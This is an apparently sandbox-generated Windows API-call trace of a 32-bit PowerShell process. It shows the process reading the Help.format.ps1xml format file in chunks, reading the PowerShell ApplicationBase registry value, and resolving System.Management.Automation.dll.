	[0160.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0160.991] GetLastError () returned 0x0
	[0160.991] SetErrorMode (uMode=0x1) returned 0x1
	[0160.991] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0160.992] GetLastError () returned 0x0
	[0160.992] GetFileType (hFile=0x34c) returned 0x1
	[0160.992] SetErrorMode (uMode=0x1) returned 0x1
	[0160.992] GetFileType (hFile=0x34c) returned 0x1
	[0160.992] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.992] GetLastError () returned 0x0
	[0160.992] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.992] GetLastError () returned 0x0
	[0160.992] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.992] GetLastError () returned 0x0
	[0160.992] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.992] GetLastError () returned 0x0
	[0160.992] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.993] GetLastError () returned 0x0
	[0160.993] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.993] GetLastError () returned 0x0
	[0160.993] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.993] GetLastError () returned 0x0
	[0160.993] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.993] GetLastError () returned 0x0
	[0160.995] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.995] GetLastError () returned 0x0
	[0160.995] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.995] GetLastError () returned 0x0
	[0160.995] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.995] GetLastError () returned 0x0
	[0160.995] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.995] GetLastError () returned 0x0
	[0160.995] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.996] GetLastError () returned 0x0
	[0160.996] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.996] GetLastError () returned 0x0
	[0160.996] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.996] GetLastError () returned 0x0
	[0160.996] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.996] GetLastError () returned 0x0
	[0160.999] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.999] GetLastError () returned 0x0
	[0160.999] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.999] GetLastError () returned 0x0
	[0160.999] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.999] GetLastError () returned 0x0
	[0161.000] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.000] GetLastError () returned 0x0
	[0161.000] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.000] GetLastError () returned 0x0
	[0161.000] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.000] GetLastError () returned 0x0
	[0161.000] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.001] GetLastError () returned 0x0
	[0161.001] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.001] GetLastError () returned 0x0
	[0161.001] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.001] GetLastError () returned 0x0
	[0161.001] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.001] GetLastError () returned 0x0
	[0161.001] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.002] GetLastError () returned 0x0
	[0161.002] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.002] GetLastError () returned 0x0
	[0161.002] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.002] GetLastError () returned 0x0
	[0161.002] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.002] GetLastError () returned 0x0
	[0161.003] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.003] GetLastError () returned 0x0
	[0161.003] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.003] GetLastError () returned 0x0
	[0161.008] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.008] GetLastError () returned 0x0
	[0161.008] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.008] GetLastError () returned 0x0
	[0161.008] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.008] GetLastError () returned 0x0
	[0161.009] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.009] GetLastError () returned 0x0
	[0161.009] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.009] GetLastError () returned 0x0
	[0161.009] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.009] GetLastError () returned 0x0
	[0161.009] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.009] GetLastError () returned 0x0
	[0161.010] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.010] GetLastError () returned 0x0
	[0161.010] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.010] GetLastError () returned 0x0
	[0161.010] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.010] GetLastError () returned 0x0
	[0161.010] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.010] GetLastError () returned 0x0
	[0161.010] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.010] GetLastError () returned 0x0
	[0161.011] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.243] GetLastError () returned 0x0
	[0161.243] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.243] GetLastError () returned 0x0
	[0161.243] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.243] GetLastError () returned 0x0
	[0161.244] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.244] GetLastError () returned 0x0
	[0161.244] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.244] GetLastError () returned 0x0
	[0161.244] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.244] GetLastError () returned 0x0
	[0161.244] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.244] GetLastError () returned 0x0
	[0161.244] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.245] GetLastError () returned 0x0
	[0161.245] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.245] GetLastError () returned 0x0
	[0161.245] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.245] GetLastError () returned 0x0
	[0161.245] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.245] GetLastError () returned 0x0
	[0161.246] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.246] GetLastError () returned 0x0
	[0161.246] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.246] GetLastError () returned 0x0
	[0161.246] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.246] GetLastError () returned 0x0
	[0161.246] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.246] GetLastError () returned 0x0
	[0161.247] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.247] GetLastError () returned 0x0
	[0161.247] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.247] GetLastError () returned 0x0
	[0161.247] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0161.247] GetLastError () returned 0x0
	[0161.248] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0xf37, lpOverlapped=0x0) returned 1
	[0161.248] GetLastError () returned 0x0
	[0161.248] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef3013, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef3013*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0161.248] GetLastError () returned 0x0
	[0161.248] ReadFile (in: hFile=0x34c, lpBuffer=0x2ef393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ef393c*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0161.248] GetLastError () returned 0x0
	[0161.248] CloseHandle (hObject=0x34c) returned 1
	[0161.248] GetLastError () returned 0x0
	[0161.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0161.248] GetLastError () returned 0x0
	[0161.249] SetErrorMode (uMode=0x1) returned 0x1
	[0161.249] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f14938 | out: lpFileInformation=0x2f14938*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0161.249] GetLastError () returned 0x0
	[0161.249] SetErrorMode (uMode=0x1) returned 0x1
	[0161.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0161.249] GetLastError () returned 0x0
	[0161.249] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce938 | out: phkResult=0xce938*=0x34c) returned 0x0
	[0161.249] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x0, lpcbData=0xce97c*=0x0 | out: lpType=0xce980*=0x1, lpData=0x0, lpcbData=0xce97c*=0x56) returned 0x0
	[0161.249] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x337c48, lpcbData=0xce97c*=0x56 | out: lpType=0xce980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce97c*=0x56) returned 0x0
	[0161.250] RegCloseKey (hKey=0x34c) returned 0x0
	[0161.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0161.250] GetLastError () returned 0x0
	[0161.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0161.250] GetLastError () returned 0x0
	[0161.263] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x9b42a47, Data2=0x10a9, Data3=0x444c, Data4=([0]=0xaf, [1]=0xe1, [2]=0x22, [3]=0x31, [4]=0x62, [5]=0x59, [6]=0xf2, [7]=0xfb))) returned 0x0
	[0161.264] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x37c88174, Data2=0xa31d, Data3=0x4b3c, Data4=([0]=0xa6, [1]=0x92, [2]=0x73, [3]=0x57, [4]=0x4f, [5]=0x90, [6]=0x2c, [7]=0xae))) returned 0x0
	[0161.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.264] GetLastError () returned 0x0
	[0161.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.264] GetLastError () returned 0x0
	[0161.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.265] GetLastError () returned 0x0
	[0161.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.265] GetLastError () returned 0x0
	[0161.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.755] GetLastError () returned 0x0
